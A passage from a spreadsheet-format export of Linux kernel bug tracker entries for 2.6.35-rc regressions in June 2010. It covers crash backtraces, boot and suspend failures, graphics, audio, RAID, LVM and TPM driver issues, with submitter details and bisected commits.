(register_netdev+0x40/0x54) from [&lt;c029e018&gt;] (bnep_add_connection+0x1e8/0x2b0) [ 362.110000] [&lt;c029e018&gt;] (bnep_add_connection+0x1e8/0x2b0) from [&lt;c029ee58&gt;] (bnep_sock_ioctl+0x11c/0x350) [ 362.130000] [&lt;c029ee58&gt;] (bnep_sock_ioctl+0x11c/0x350) from [&lt;c021eff4&gt;] (sock_ioctl+0x1fc/0x258) [ 362.130000] [&lt;c021eff4&gt;] (sock_ioctl+0x1fc/0x258) from [&lt;c0097df4&gt;] (vfs_ioctl+0x30/0xb0) [ 362.160000] [&lt;c0097df4&gt;] (vfs_ioctl+0x30/0xb0) from [&lt;c00984c4&gt;] (do_vfs_ioctl+0x540/0x590) [ 362.160000] [&lt;c00984c4&gt;] (do_vfs_ioctl+0x540/0x590) from [&lt;c009854c&gt;] (sys_ioctl+0x38/0x58) [ 362.180000] [&lt;c009854c&gt;] (sys_ioctl+0x38/0x58) from [&lt;c0022ea0&gt;] (ret_fast_syscall+0x0/0x2c) [ 362.200000] ---[ end trace 3568a713ba0db0af ]---</t>
  </si>
  <si>
    <t>md/raid/udev fails to create md partition devices (/dev/mdXpY)</t>
  </si>
  <si>
    <t>2010-06-15 17:19 UTC</t>
  </si>
  <si>
    <t>2010-07-08 22:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 26784 [details] config 2.6.35-rc3 I'm running multiple md/raid devices, mostly raid-1, some partitioned, some not, on the same set of four spindles, identically partitioned such that partitions sd[abcd]N assemble into an md/raid device. With kernel 2.6.34, the system boots fine, the md partition devices (mdXpY) show up in /dev, and everything mounts normally. With kernel 2.6.35-rc3, localmount says it can't find various labeled filesystems to mount. A bit of investigation later, I realize the only /dev/mdXpY devices showing up are the ones for the rootfs, assembled from the kernel command line. The unpartitioned md devices and the other partitioned md main devices (/dev/mdX) show up, and gdisk (the partitions are GPT, not legacy MBR) sees the partition table, which appears to be intact on the devices, but the /dev/mdXpY devices themselves (other than for the rootfs assembled from the kernel command line) don't show up. System is a dual Opteron 290, Tyan s2885 mobo, 6 gigs RAM, running Gentoo/~amd64. All of userspace was recently fresh-rebuilt on gcc-4.5.0, which was used to compile 2.6.35-rc3 as well, tho the 2.6.34 kernel was compiled earlier with gcc 4.4.3. Related userspace apps: mdadm 3.1.2, util-linux 2.17.2, udev 154. Filesystems are reiserfs (until btrfs can safely replace it). md/raid metadata version 0.90. As far as I can see, the only thing creating the mdXpY devices is the kernel/udev, no funny gentoo or local udev rules or initscript voodoo in that regard. The kernel config should be attached and I can git bisect. But first: 1) This isn't already known and bisected, is it? New report? 2) No known data corruption bombs waiting to blow up the unwary git bisector in the 2.6.35 development series, I hope? (That's why I wait until rc2 or so before testing, any data corruption bombs should be fixed by then, hopefully.)</t>
  </si>
  <si>
    <t>2.6.35-rc2-git5 -- [drm:drm_mode_getfb] *ERROR* invalid framebuffer id</t>
  </si>
  <si>
    <t>2.6.35-rc2-git5</t>
  </si>
  <si>
    <t>2010-06-15 20:28 UTC</t>
  </si>
  <si>
    <t>2011-03-31 07:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc2-git5 -- [drm:drm_mode_getfb] *ERROR* invalid framebuffer id Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-06-11 20:31 Message-ID : AANLkTim0jVRyqkwlGOcrg_XTvUQwcBYfWJX-aRzkkrLG@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127628828119623&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-rc{12} regression: inactive console corrupted</t>
  </si>
  <si>
    <t>2010-06-15 20:36 UTC</t>
  </si>
  <si>
    <t>2010-06-22 13:06 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc{12} regression: inactive console corrupted Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2010-06-12 10:33 Message-ID : 20100612103321.GA1458@ucw.cz References : http://marc.info/?l=linux-kernel&amp;m=127633882614501&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG/boot failure on Dell Precision T3500 (pci/ahci_stop_engine)</t>
  </si>
  <si>
    <t>2010-06-16 17:57 UTC</t>
  </si>
  <si>
    <t>Brian Bloniarz</t>
  </si>
  <si>
    <t>2010-12-17 15:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 26811 [details] Boot log 2.6.35-rc3 (failure leading to ahci_stop_engine BUG) 2.6.35-rc3 does not boot on my Dell Precision T3500 due to PCI issues, culminating in: &gt; BUG: unable to handle kernel paging request at ffffc90012621018 in ahci_stop_engine. Other things I've tried: v2.6.35-rc3, pci=nocrs: boots successfully. v2.6.35-rc1: has same BUG as v2.6.35-rc3 v2.6.34: fails to boot (timeout on the root device), but no BUG. v2.6.33: boots successfully The logs from these boots are attached.</t>
  </si>
  <si>
    <t>inconsistent IN-HARDIRQ-W -&gt; HARDIRQ-ON-W usage: fasync, 2.6.35-rc3</t>
  </si>
  <si>
    <t>2010-06-16 19:33 UTC</t>
  </si>
  <si>
    <t>2010-07-09 21:26 UTC</t>
  </si>
  <si>
    <t>Subject : inconsistent IN-HARDIRQ-W -&gt; HARDIRQ-ON-W usage: fasync, 2.6.35-rc3 Submitter : Dominik Brodowski &lt;linux@dominikbrodowski.net&gt; Date : 2010-06-13 9:53 Message-ID : 20100613095305.GA13231@comet.dominikbrodowski.net References : http://marc.info/?l=linux-kernel&amp;m=127642282208277&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Noticeable slow-down in 2.6.35-rc3</t>
  </si>
  <si>
    <t>2010-06-16 19:39 UTC</t>
  </si>
  <si>
    <t>2010-06-27 22:44 UTC</t>
  </si>
  <si>
    <t>Subject : Noticeable slow-down in 2.6.35-rc3 Submitter : Chris Clayton &lt;chris2553@googlemail.com&gt; Date : 2010-06-13 20:15 Message-ID : AANLkTimDUf0N6b5PBy2wTGeAWEIY-lUvQPHQ7D7Gyrq4@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127646015226601&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline. Caused by: commit 597a264b1a9c7e36d1728f677c66c5c1f7e3b837 Author: John Fastabend &lt;john.r.fastabend@intel.com&gt; Date: Thu Jun 3 09:30:11 2010 +0000 net: deliver skbs on inactive slaves to exact matches First-Bad-Commit : 597a264b1a9c7e36d1728f677c66c5c1f7e3b837</t>
  </si>
  <si>
    <t>2.6.35-rc3 - WARNING:iwl_set_dynamic_key</t>
  </si>
  <si>
    <t>2010-06-16 20:11 UTC</t>
  </si>
  <si>
    <t>2010-07-23 11:26 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc3 - WARNING:iwl_set_dynamic_key Submitter : Mario Guenterberg &lt;mario.guenterberg@googlemail.com&gt; Date : 2010-06-14 11:55 Message-ID : 20100614115510.GA7904@guenti-laptop References : http://marc.info/?l=linux-kernel&amp;m=127651695627147&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[REGRESSION] [IWL3945] Broadcast is broken?</t>
  </si>
  <si>
    <t>2010-06-16 20:24 UTC</t>
  </si>
  <si>
    <t>2010-07-08 22:51 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] [IWL3945] Broadcast is broken? Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2010-06-14 17:24 Message-ID : 201006141924.24061.maciej.rutecki@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127653628301300&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Battery insert while system is asleep causes sometimes a crash</t>
  </si>
  <si>
    <t>2010-06-18 00:30 UTC</t>
  </si>
  <si>
    <t>2012-01-19 00:46 UTC</t>
  </si>
  <si>
    <t>Backtrace: &lt;6&gt;[ 2763.330466] [drm] nouveau 0000:01:00.0: 0xB6F9: parsing clock script 1 &lt;6&gt;[ 2763.533828] ata3: SATA link down (SStatus 0 SControl 300) &lt;6&gt;[ 2763.552678] ata2: SATA link down (SStatus 0 SControl 300) &lt;6&gt;[ 2763.570498] ata4.00: configured for UDMA/33 &lt;0&gt;[ 2763.650740] ------------[ cut here ]------------ &lt;2&gt;[ 2763.650751] kernel BUG at /home/maxim/software/kernel/linux-2.6/kernel/workqueue.c:312! &lt;0&gt;[ 2763.650762] invalid opcode: 0000 [#1] PREEMPT SMP &lt;0&gt;[ 2763.650772] last sysfs file: /sys/power/state &lt;4&gt;[ 2763.650779] CPU 0 &lt;4&gt;[ 2763.650784] Modules linked in: lirc_ene0100 af_packet iwl3945 iwlcore uvcvideo videodev mac80211 snd_hda_codec_realtek v4l2_compat_ioctl32 usb_storage uhci_hcd snd_hda_intel usb_libusual ehci_hcd snd_hda_codec joydev usbcore cpufreq_powersave tg3 cfg80211 cpufreq_conservative snd_hwdep r852 sdhci_pci sdhci psmouse cpufreq_userspace snd_pcm acpi_cpufreq mperf iTCO_wdt iTCO_vendor_support mmc_core libphy sm_common nand video coretemp ac nand_ids nand_ecc mtd snd_page_alloc sg battery lirc_dev serio_raw evdev nouveau ttm drm_kms_helper drm i2c_algo_bit &lt;4&gt;[ 2763.650886] &lt;4&gt;[ 2763.650893] Pid: 145, comm: kacpi_notify Not tainted 2.6.35-rc3+ #73 Nettiling/Aspire 5720 &lt;4&gt;[ 2763.650904] RIP: 0010:[&lt;ffffffff81056424&gt;] [&lt;ffffffff81056424&gt;] queue_work_on+0x44/0x50 &lt;4&gt;[ 2763.650923] RSP: 0018:ffff88006ffa7cd0 EFLAGS: 00010213 &lt;4&gt;[ 2763.650931] RAX: ffff88006c273908 RBX: ffff88006fc195a0 RCX: 0000000000000000 &lt;4&gt;[ 2763.650941] RDX: ffff88006c273900 RSI: ffff88006fc195a0 RDI: 0000000000000000 &lt;4&gt;[ 2763.650950] RBP: ffff88006ffa7cd0 R08: 0000000000000000 R09: 0000000000000000 &lt;4&gt;[ 2763.650959] R10: 0000000000000000 R11: 0000000000000001 R12: ffff88006c273900 &lt;4&gt;[ 2763.650968] R13: 0000000000000081 R14: ffffffff81211889 R15: ffff88006ffb0000 &lt;4&gt;[ 2763.650979] FS: 0000000000000000(0000) GS:ffff880002400000(0000) knlGS:0000000000000000 &lt;4&gt;[ 2763.650989] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b &lt;4&gt;[ 2763.650998] CR2: 00007f9073d926b0 CR3: 000000000155d000 CR4: 00000000000006f0 &lt;4&gt;[ 2763.651007] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 &lt;4&gt;[ 2763.651016] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 &lt;4&gt;[ 2763.651026] Process kacpi_notify (pid: 145, threadinfo ffff88006ffa6000, task ffff88006ffb0000) &lt;0&gt;[ 2763.651036] Stack: &lt;4&gt;[ 2763.651040] ffff88006ffa7cf0 ffffffff81056479 ffff88006c273898 ffff88006fc3e000 &lt;4&gt;[ 2763.651052] &lt;0&gt; ffff88006ffa7d00 ffffffff810564c3 ffff88006ffa7d30 ffffffff812c6d1e &lt;4&gt;[ 2763.651065] &lt;0&gt; ffff88006fc3e000 0000000000000081 ffffffff81211889 ffff88006c273800 &lt;0&gt;[ 2763.651079] Call Trace: &lt;4&gt;[ 2763.651089] [&lt;ffffffff81056479&gt;] queue_work+0x29/0x60 &lt;4&gt;[ 2763.651099] [&lt;ffffffff810564c3&gt;] schedule_work+0x13/0x20 &lt;4&gt;[ 2763.651111] [&lt;ffffffff812c6d1e&gt;] power_supply_changed+0x1e/0x70 &lt;4&gt;[ 2763.651124] [&lt;ffffffff81211889&gt;] ? acpi_os_execute_deferred+0x0/0x31 &lt;4&gt;[ 2763.651140] [&lt;ffffffffa006b6de&gt;] acpi_battery_notify+0x76/0x7e [battery] &lt;4&gt;[ 2763.651152] [&lt;ffffffff812148da&gt;] acpi_device_notify+0x14/0x16 &lt;4&gt;[ 2763.651163] [&lt;ffffffff81223244&gt;] acpi_ev_notify_dispatch+0x62/0x7a &lt;4&gt;[ 2763.651175] [&lt;ffffffff812118ad&gt;] acpi_os_execute_deferred+0x24/0x31 &lt;4&gt;[ 2763.651186] [&lt;ffffffff81055eb0&gt;] worker_thread+0x220/0x390 &lt;4&gt;[ 2763.651197] [&lt;ffffffff81055e5e&gt;] ? worker_thread+0x1ce/0x390 &lt;4&gt;[ 2763.651209] [&lt;ffffffff8105ace0&gt;] ? autoremove_wake_function+0x0/0x40 &lt;4&gt;[ 2763.651221] [&lt;ffffffff81055c90&gt;] ? worker_thread+0x0/0x390 &lt;4&gt;[ 2763.651231] [&lt;ffffffff8105a85e&gt;] kthread+0xae/0xc0 &lt;4&gt;[ 2763.651244] [&lt;ffffffff81003b94&gt;] kernel_thread_helper+0x4/0x10 &lt;4&gt;[ 2763.651255] [&lt;ffffffff8105a7b0&gt;] ? kthread+0x0/0xc0 &lt;4&gt;[ 2763.651265] [&lt;ffffffff81003b90&gt;] ? kernel_thread_helper+0x0/0x10 &lt;0&gt;[ 2763.651273] Code: 75 29 44 8b 46 20 45 85 c0 75 24 48 8b 06 48 63 ff 48 89 d6 48 03 04 fd 20 3a 5b 81 48 89 c7 e8 03 ff ff ff b8 01 00 00 00 c9 c3 &lt;0f&gt; 0b eb fe 8b 3d 92 d8 55 00 eb d4 55 48 89 f2 48 89 e5 48 8b &lt;1&gt;[ 2763.651351] RIP [&lt;ffffffff81056424&gt;] queue_work_on+0x44/0x50 &lt;4&gt;[ 2763.651362] RSP &lt;ffff88006ffa7cd0&gt; &lt;4&gt;[ 2763.655505] ---[ end trace 67498c368c7e7da0 ]--- &lt;0&gt;[ 2763.655514] Kernel panic - not syncing: Fatal exception &lt;4&gt;[ 2763.655523] Pid: 145, comm: kacpi_notify Tainted: G D 2.6.35-rc3+ #73 &lt;4&gt;[ 2763.655532] Call Trace: &lt;4&gt;[ 2763.655543] [&lt;ffffffff8139fb38&gt;] panic+0x90/0x10a &lt;4&gt;[ 2763.655554] [&lt;ffffffff8100737c&gt;] oops_end+0xcc/0xe0 &lt;4&gt;[ 2763.655563] [&lt;ffffffff81007586&gt;] die+0x56/0x90 &lt;4&gt;[ 2763.655574] [&lt;ffffffff81004364&gt;] do_trap+0xc4/0x170 &lt;4&gt;[ 2763.655585] [&lt;ffffffff81211889&gt;] ? acpi_os_execute_deferred+0x0/0x31 &lt;4&gt;[ 2763.655597] [&lt;ffffffff81211889&gt;] ? acpi_os_execute_deferred+0x0/0x31 &lt;4&gt;[ 2763.655607] [&lt;ffffffff81004810&gt;] do_invalid_op+0x90/0xb0 &lt;4&gt;[ 2763.655618] [&lt;ffffffff81056424&gt;] ? queue_work_on+0x44/0x50 &lt;4&gt;[ 2763.655629] [&lt;ffffffff813a41d3&gt;] ? _raw_spin_unlock_irqrestore+0x33/0x60 &lt;4&gt;[ 2763.655640] [&lt;ffffffff810304be&gt;] ? __wake_up+0x4e/0x70 &lt;4&gt;[ 2763.655651] [&lt;ffffffff81003a15&gt;] invalid_op+0x15/0x20 &lt;4&gt;[ 2763.655662] [&lt;ffffffff81211889&gt;] ? acpi_os_execute_deferred+0x0/0x31 &lt;4&gt;[ 2763.655673] [&lt;ffffffff81056424&gt;] ? queue_work_on+0x44/0x50 &lt;4&gt;[ 2763.655684] [&lt;ffffffff81056479&gt;] queue_work+0x29/0x60 &lt;4&gt;[ 2763.655694] [&lt;ffffffff810564c3&gt;] schedule_work+0x13/0x20 &lt;4&gt;[ 2763.655704] [&lt;ffffffff812c6d1e&gt;] power_supply_changed+0x1e/0x70 &lt;4&gt;[ 2763.655716] [&lt;ffffffff81211889&gt;] ? acpi_os_execute_deferred+0x0/0x31 &lt;4&gt;[ 2763.655730] [&lt;ffffffffa006b6de&gt;] acpi_battery_notify+0x76/0x7e [battery] &lt;4&gt;[ 2763.655742] [&lt;ffffffff812148da&gt;] acpi_device_notify+0x14/0x16 &lt;4&gt;[ 2763.655752] [&lt;ffffffff81223244&gt;] acpi_ev_notify_dispatch+0x62/0x7a &lt;4&gt;[ 2763.655764] [&lt;ffffffff812118ad&gt;] acpi_os_execute_deferred+0x24/0x31 &lt;4&gt;[ 2763.655775] [&lt;ffffffff81055eb0&gt;] worker_thread+0x220/0x390 &lt;4&gt;[ 2763.655785] [&lt;ffffffff81055e5e&gt;] ? worker_thread+0x1ce/0x390 &lt;4&gt;[ 2763.655797] [&lt;ffffffff8105ace0&gt;] ? autoremove_wake_function+0x0/0x40 &lt;4&gt;[ 2763.655808] [&lt;ffffffff81055c90&gt;] ? worker_thread+0x0/0x390 &lt;4&gt;[ 2763.655818] [&lt;ffffffff8105a85e&gt;] kthread+0xae/0xc0 &lt;4&gt;[ 2763.655830] [&lt;ffffffff81003b94&gt;] kernel_thread_helper+0x4/0x10 &lt;4&gt;[ 2763.655840] [&lt;ffffffff8105a7b0&gt;] ? kthread+0x0/0xc0 &lt;4&gt;[ 2763.655851] [&lt;ffffffff81003b90&gt;] ? kernel_thread_helper+0x0/0x10 linux-acpi-next/release tree was used when this backtrace happened. Note that I just recently fixed suspend/resume on my notebook, therefore I don't know if this is a regression. Already happened twice.</t>
  </si>
  <si>
    <t>drm/i915 BUG with 2.6.35-rc</t>
  </si>
  <si>
    <t>2010-06-18 19:05 UTC</t>
  </si>
  <si>
    <t>2010-07-08 23:17 UTC</t>
  </si>
  <si>
    <t>Subject : drm/i915 BUG with 2.6.35-rc Submitter : Benny Halevy &lt;bhalevy@panasas.com&gt; Date : 2010-06-14 22:38 Message-ID : 4C16AF56.1040002@panasas.com References : http://marc.info/?l=linux-kernel&amp;m=127655510531367&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>inconsistent lock state</t>
  </si>
  <si>
    <t>2010-06-18 19:09 UTC</t>
  </si>
  <si>
    <t>2010-07-08 22:55 UTC</t>
  </si>
  <si>
    <t>Subject : inconsistent lock state Submitter : Sergey Senozhatsky &lt;sergey.senozhatsky@gmail.com&gt; Date : 2010-06-15 11:24 Message-ID : 20100615112434.GA3967@swordfish.minsk.epam.com References : http://marc.info/?l=linux-kernel&amp;m=127660087625903&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hda realtek missing beep mixer control for chip 10ec0883</t>
  </si>
  <si>
    <t>2010-06-19 12:48 UTC</t>
  </si>
  <si>
    <t>2010-08-25 11:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 26860 [details] patch to enable beep on this codec id The PC-Spekaer Beep control worked in 2.6.34, but not 2.6.35-rc1, this is the patch that modified that behavior. "ALSA: hda - Add parse customize define function for Realtek codecs" regression in commit da00c24493bf6ae3772dfe7343dca033ebc75955. Debug output (after this patch), HDA Intel 0000:00:14.2: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 SKU: Nid=0x0 sku_cfg=0x0000140d SKU: port_connectivity=0x0 SKU: enable_pcbeep=0x0 SKU: check_sum=0x00000000 SKU: customization=0x00000000 SKU: external_amp=0x1 SKU: platform_type=0x1 SKU: swap=0x0 SKU: override=0x1 hda_codec: ALC883: BIOS auto-probing. autoconfig: line_outs=1 (0x14/0x0/0x0/0x0/0x0) speaker_outs=0 (0x0/0x0/0x0/0x0/0x0) hp_outs=0 (0x0/0x0/0x0/0x0/0x0) mono: mono_out=0x0 dig-out=0x1e/0x0 inputs: mic=0x18, fmic=0x0, line=0x1a, fline=0x0, cd=0x1c, aux=0x0 realtek: Enabling init ASM_ID=0x140d CODEC_ID=10ec0883 input: HDA Digital PCBeep as /devices/pci0000:00/0000:00:14.2/input/input16</t>
  </si>
  <si>
    <t>2.6.35-rc3 deadlocks on semaphore operations</t>
  </si>
  <si>
    <t>2010-06-20 06:54 UTC</t>
  </si>
  <si>
    <t>2010-07-23 11:25 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc3 deadlocks on semaphore operations Submitter : Christoph Lameter &lt;cl@linux-foundation.org&gt; Date : 2010-06-18 14:49 Message-ID : alpine.DEB.2.00.1006180940140.11575@router.home References : http://marc.info/?l=linux-kernel&amp;m=127687262727707&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>tpm_tis breaks suspend/hibernate on kernels &gt; 2.6.34</t>
  </si>
  <si>
    <t>2.6.35-rc3-wl</t>
  </si>
  <si>
    <t>2010-06-20 11:15 UTC</t>
  </si>
  <si>
    <t>Helmut Schaa</t>
  </si>
  <si>
    <t>2010-08-01 13:39 UTC</t>
  </si>
  <si>
    <t>I recently switched to 2.6.35-rcX-wl (wireless-testing) for development and discovered that only the first issued suspend/hibernate was successful, every subsequent suspend/hibernate failed with the following in dmesg: legacy_suspend(): pnp_bus_suspend+0x0/0x6a returns 28 PM: Device 00:02 failed to suspend: error 28 PM: Some devices failed to suspend Device 00:02 is owned by the tpm_tis driver. Unloading tpm_tis before suspend fixes this issue for me. I didn't have such problems with kernels &lt;2.6.35 and it seems the culprit is the patch "TPM: workaround to enforce PCR updates across suspends" which introduced a return value in tpm_pm_suspend if transmit_cmd fails: [...] - tpm_transmit(chip, savestate, sizeof(savestate)); - return 0; + /* for buggy tpm, flush pcrs with extend to selected dummy */ + if (tpm_suspend_pcr) { + cmd.header.in = pcrextend_header; + cmd.params.pcrextend_in.pcr_idx = cpu_to_be32(tpm_suspend_pcr); + memcpy(cmd.params.pcrextend_in.hash, dummy_hash, + TPM_DIGEST_SIZE); + rc = transmit_cmd(chip, &amp;cmd, EXTEND_PCR_RESULT_SIZE, + "extending dummy pcr before suspend"); + } + + /* now do the actual savestate */ + cmd.header.in = savestate_header; + rc = transmit_cmd(chip, &amp;cmd, SAVESTATE_RESULT_SIZE, + "sending savestate before suspend"); + return rc; [...] In the meantime I was able to find a workaround for this issue and sent a PATCH to the tpmdd-devel list [1] but unfortunately got no reply yet. Since I have really _no_ knowledge at all about tpm stuff I'd like to get the patch reviewed first from somebody working on the tpm stuff. Thanks, Helmut [1] http://sourceforge.net/mailarchive/forum.php?thread_name=201006091511.09810.helmut.schaa%40googlemail.com&amp;forum_name=tpmdd-devel</t>
  </si>
  <si>
    <t>Why is kslowd accumulating so much CPU time?</t>
  </si>
  <si>
    <t>2010-06-21 19:04 UTC</t>
  </si>
  <si>
    <t>2011-04-09 17:45 UTC</t>
  </si>
  <si>
    <t>Subject : Why is kslowd accumulating so much CPU time? Submitter : "Theodore Ts'o" &lt;tytso@mit.edu&gt; Date : 2010-06-09 18:36 Message-ID : E1OMQ88-0002a1-Gb@closure.thunk.org References : http://marc.info/?l=linux-kernel&amp;m=127610857819033&amp;w=4 This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline. Caused by: commit fbf81762e385d3d45acad057b654d56972acf58c Author: Dave Airlie &lt;airlied@redhat.com&gt; Date: Tue Jun 1 09:09:06 2010 +1000 drm/kms: disable/enable poll around switcheroo on/off Because we aren't in a suspend state the poll will still run when we have switcherooed a card off. Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : fbf81762e385d3d45acad057b654d56972acf58c</t>
  </si>
  <si>
    <t>2.6.35-rc3 regression: IBM Maia system is unbootable [ACPI related?]</t>
  </si>
  <si>
    <t>2010-06-22 14:27 UTC</t>
  </si>
  <si>
    <t>2010-07-27 18:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc3 regression: IBM Maia system is unbootable [ACPI related?] Submitter : James Bottomley &lt;James.Bottomley@hansenpartnership.com&gt; Date : 2010-06-21 16:03 Message-ID : 1277136189.10998.63.camel@mulgrave.site References : http://marc.info/?l=linux-kernel&amp;m=127713622821166&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>switching to 2.6.34 broke audio on toshiba satellite x205-s9800 using snd_hda_intel module</t>
  </si>
  <si>
    <t>2010-06-22 21:48 UTC</t>
  </si>
  <si>
    <t>wiggyxoxox</t>
  </si>
  <si>
    <t>2010-09-10 10:05 UTC</t>
  </si>
  <si>
    <t>I switched from 3.6.33 on both sabayon and archlinux distros and both suffer the same symptom of no audio. alsaconf yeilds: Loading driver... :: Saving ALSA Levels [BUSY] /usr/sbin/alsactl: save_state:1504: No soundcards found.. [DONE] :: Restoring ALSA Levels [BUSY] /usr/sbin/alsactl: load_state:1610: No soundcards found...... [FAIL] Setting default volumes... amixer: Mixer attach default error: No such file or directory --------- and if I try to force it by adding snd_hda_intel to modules I hang on boot. also going to attach dmesg ........ reinstalled 3.6.33 and problem is gone, went back to 3.6.34 and broken. after no luck fixing it on archforum I was told to post it "upstream" so here it is. thanks for all of the work you do. let me know if any more info is required.</t>
  </si>
  <si>
    <t>lvm snapshot causes deadlock in 2.6.35</t>
  </si>
  <si>
    <t>2.6.35-rc[123]</t>
  </si>
  <si>
    <t>2010-06-23 16:55 UTC</t>
  </si>
  <si>
    <t>Phillip Susi</t>
  </si>
  <si>
    <t>2010-08-29 22:57 UTC</t>
  </si>
  <si>
    <t>Copying from: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/595489 Attempting to snapshot the root lv causes a deadlock in 2.6.35 when it suspends the root lv device to replace the table. The lvcreate -n snap -s -L 1g lv/root command hangs, can not be killed, and no further IO is possible, and the system must be hard booted with magic-sysrq. Narrowed down cause to commit 6b0310fbf087ad6: "ext4: don't return to userspace after freezing the fs with a mutex held". After reversing this change, the problem goes away.</t>
  </si>
  <si>
    <t>i915 is unusable due to CRT hotplug bug</t>
  </si>
  <si>
    <t>2010-06-23 22:46 UTC</t>
  </si>
  <si>
    <t>2010-07-08 23:26 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.35 regression ping] i915 is unusable due to CRT hotplug bug Submitter : Andy Lutomirski &lt;luto@mit.edu&gt; Date : 2010-06-16 04:38 References : https://patchwork.kernel.org/patch/105727/ This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[Q35 bisected] hang at init of i915 driver</t>
  </si>
  <si>
    <t>2.6.35</t>
  </si>
  <si>
    <t>2010-06-25 18:20 UTC</t>
  </si>
  <si>
    <t>2010-09-08 22:47 UTC</t>
  </si>
  <si>
    <t>commit f1befe71fa7a79ab733011b045639d8d809924ad, found via bisect, causes my system to hang at boot. With it reverted, my system is fine. https://launchpad.net/bugs/597075 00:02.0 0300: 8086:29b2 (rev 02) Subsystem: 8086:4f4a Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 47 Region 0: Memory at e0380000 (32-bit, non-prefetchable) [size=512K] Region 1: I/O ports at 2458 [size=8] Region 2: Memory at d0000000 (32-bit, prefetchable) [size=256M] Region 3: Memory at e0200000 (32-bit, non-prefetchable) [size=1M] Capabilities: &lt;access denied&gt; Kernel driver in use: i915 Kernel modules: i915</t>
  </si>
  <si>
    <t>[2.6.34 regression] mplayer gets out of sync due to problems with ALSA</t>
  </si>
  <si>
    <t>2010-06-26 20:39 UTC</t>
  </si>
  <si>
    <t>2010-10-28 23:28 UTC</t>
  </si>
  <si>
    <t>Created attachment 26954 [details] 2.6.34 .config I have the following problem: I'm unable to watch movies in mplayer because mplayer randomly skips long chunks of video/audio thus video is randomly accelerated to a point where you cannot even understand what's being played. Caveats: 1) This bug occurs in kernel 2.6.34 with Intel drivers 2) This bug does NOT occur in kernel 2.6.34 with NVIDIA drivers (on the same PC) 3) This bug does NOT occur in kernel 2.6.33 with any drivers (on the same PC) I have a very fast CPU (Intel Core i5), playing videos in question consumes less than 5% of CPU, films are stored locally, so I do NOT have issues with IO or system load. When I play videos my PC is usually 100% idle. I have captured mplayer's output, you can download it from here: http://www.mediafire.com/?y2ymtyz3yzt</t>
  </si>
  <si>
    <t>[bisected] i915 in kernel 2.6.35-rc3, high number of wakeups</t>
  </si>
  <si>
    <t>2010-06-27 20:04 UTC</t>
  </si>
  <si>
    <t>2012-08-04 19:07 UTC</t>
  </si>
  <si>
    <t>Subject : i915 in kernel 2.6.35-rc3, high number of wakeups Submitter : Enrico Bandiello &lt;enban@postal.uv.es&gt; Date : 2010-06-26 16:57 Message-ID : 4C26317A.5070309@postal.uv.es References : http://marc.info/?l=linux-kernel&amp;m=127757403404259&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-rc3 oops trying to suspend.</t>
  </si>
  <si>
    <t>2010-06-28 17:17 UTC</t>
  </si>
  <si>
    <t>2010-07-09 21:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc3 oops trying to suspend. Submitter : Andrew Hendry &lt;andrew.hendry@gmail.com&gt; Date : 2010-06-27 12:40 Message-ID : AANLkTinUH2p33-AWxOVDrLsNkn9rgEVrlwn5mfK7P8NH@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127764249926781&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>arm omap invalid module format</t>
  </si>
